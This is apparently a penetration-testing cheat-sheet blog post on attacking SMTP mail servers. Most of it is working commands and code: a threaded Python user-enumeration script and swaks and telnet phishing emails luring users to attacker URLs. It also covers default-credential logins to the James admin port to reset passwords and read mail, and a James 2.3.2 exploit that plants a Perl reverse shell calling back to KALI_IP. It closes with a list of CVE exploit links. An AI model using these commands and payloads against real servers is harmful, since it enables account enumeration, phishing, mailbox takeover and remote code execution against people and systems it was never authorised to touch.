SMTP - Port 25 Enumeration

Basic info About SMTP Commands

PIPELINING – Pipelining Sends batches of SMTP commands without waiting for a response from the SMTP Server to individual comments.
SIZE – SIZE extension has two purposes:
    To give the server an estimate of the size of a message before the message is transmitted.
    To warn the client that messages above a certain size will not be accepted.
ETRN – allows an SMTP server to send a request to another SMTP server to send any e-mail messages it has. The ETRN command has been specifically designed to allow integration with dial-up mail servers.
8BITMIME – is a way for SMTP servers that support it to transmit email using 8-bit character sets in a standards-compliant way that won’t break old servers.
DSN – DSN (Delivery Status Notification) is an extension to SMTP email delivery that can notify senders about the status of their message’s delivery.
STARTTLS –  StartTLS is mainly used as a protocol extension for communication by e-mail, based on the protocols SMTP, IMAP, and POP. In order to encrypt the information transmitted.

SMTP User Enum

smtp-user-enum -U /usr/share/SecLists/Usernames/Honeypot-Captures/multiplesources-users-fabian-fingerle.de.txt -D DOMAIN.com -t 10.10.10.10 -m 50 -M RCPT

Commonly used smtp names

SMTP Enum via NC/Telnet

nc -nv 10.10.10.10 25
EHLO domain.com

SMTP User Enum Script

import sys
import socket
import threading
 
ip = '10.13.38.12'
domain = 'EXCHANGE.HTB.LOCAL'
mail_from = 'morph3@ecorp.com'
n_threads = 50
m_list = []
t_list = []
 
if (len(sys.argv) < 2):
    print("python smtp_user_enum.py wordlist.txt")
    sys.exit(1)
 
fn = sys.argv[1]
f = open(fn,"r")
[m_list.append(m.replace("\n","")) for m in f]
m_list.reverse()
 
def send_mail():
    while True:
        try:
            print len(m_list)
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((ip, 25))
            r = s.recv(1024)
            s.send(("HELO {}\r\n".format(domain)).encode())
            r = s.recv(1024)
            s.send(("MAIL FROM: {}\r\n".format(mail_from)).encode())
            r = s.recv(1024)
            x = m_list.pop()
            s.send("RCPT TO: {}@humongousretail.com\r\n".format(x))
            r = s.recv(1024)
            r = r.decode()
            if "550" not in r:
                print x
        except IndexError:
            sys.exit(1)
    return 
 
for t in range(n_threads):
    t = threading.Thread(target=send_mail,)
    t_list.append(t)
    t.daemon = True
    t.start()
 
for t in t_list:
    try:  
        t.join()
    except KeyboardInterrupt:
        sys.exit(1)

 Send Email to Multiple Emails 

 while read mail; do swaks --to $mail --from it@Bhanu.notes --header “Subject: Testing the below url” --body " open this url dude http://10.10.14.63/ " --server 10.10.10.10; done < mail.txt

Send Email via SMTP 

swaks --to sales@domain.com --from it@domain.com --header "Subject: Credentials / Errors" --body "website_name http://10.10.10.10/" --server domain.com

Send an email via SMTP TO users 

telnet 10.10.10.10 25 

MAIL FROM: IT@company.com
RCPT TO: user@company.com
DATA
yo, please click on my reverse shell, so that i can hack you at http://10.10.10.10/
.
quit

If you have email and Credentials --> login using Evolution tool

evolution

A service running SMTP - Simple Mail Transfer Protocol looks like this

Port - 25,110 and someother UDP ports (4555) should be open for proper enum

As it was saying Admin panel on 4555 lets take a look at it. 

use telnet for better response . 

telnet IP_ADDRESS 4555

try default login creds - root/root

help     /View commands 

adduser  /add a new user 

listusers /list all users

lets reset the users passwords 

telnet IP_ADDRESS 4555

setpassword user password        /reset the password, later we can read mails with these creds

View Emails from SMTP Server

telnet IP_ADDRESS 110 

USER john
PASS john

LIST       /list the received emails

OK 0 0      /if you see anything other than "0" --> there should be an email for them

RETR 1     /View the first mail

Exploiting James SMTP Server 2.3.2 


creating an user:
telnet IP_ADDRESS 4555
root  /username
root  /pass
adduser ../../../../../../../../etc/bash_completion.d password


sending a mail:
----------------
telnet ip_address 25
EHLO someone@mydomain
MAIL FROM: <'@mydomain>
RCPT TO: <../../../../../../../../etc/bash_completion.d>
DATA
FROM: someone@mydomain
'
perl -e 'use Socket;$i="KALI_IP";$p=9007;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
.
quit


Gaining the Shell:

nc -nvlp 9007        /Will get a shell right after we login to SSH

ssh user@IP_ADDRESS 

if you get a  limited shell, try gaining one more reverse shell to another terminal and 
try it.

POC Links for CVE's

Serach for a CVE here first - Trickest/cve Apache CVE-2024-38475 - CVE-2024-38475 #version less than 2.4.51 CVE-2021-44790 - h ttps://www.exploit-db.com/exploits/51193 #Apache HTTP Server 2.4.50 CVE-2021-42013 - https://www.exploit-db.com/exploits/50406 use https://github.com/mrmtwoj/apache-vulnerability-testing for below CVE's CVE-2024-38472: Apache HTTP Server on Windows UNC SSRF CVE-2024-39573: mod_rewrite proxy handler substitution CVE-2024-38477: Crash resulting in Denial of Service in mod_proxy CVE-2024-38476: Exploitable backend application output causing internal redirects CVE-2024-38475: mod_rewrite weakness with filesystem path matching CVE-2024-38474: Weakness with encoded question marks in backreferences CVE-2024-38473: mod_proxy proxy encoding problem CVE-2023-38709: HTTP response splitting EXIM #suppodily should work for versions below Exim 4.96.1 - is not accurate CVE-2023-42115 - https://github.com/AdaHop-Cyber-Security/Pocy/tree/main

Steinz Security

Search This Blog

SMTP - Port 25 Enumeration

Labels

Comments

Post a Comment

Popular posts from this blog

POC Links for CVE's

Cracking Password Protected 7z files

Hash Extension Attacks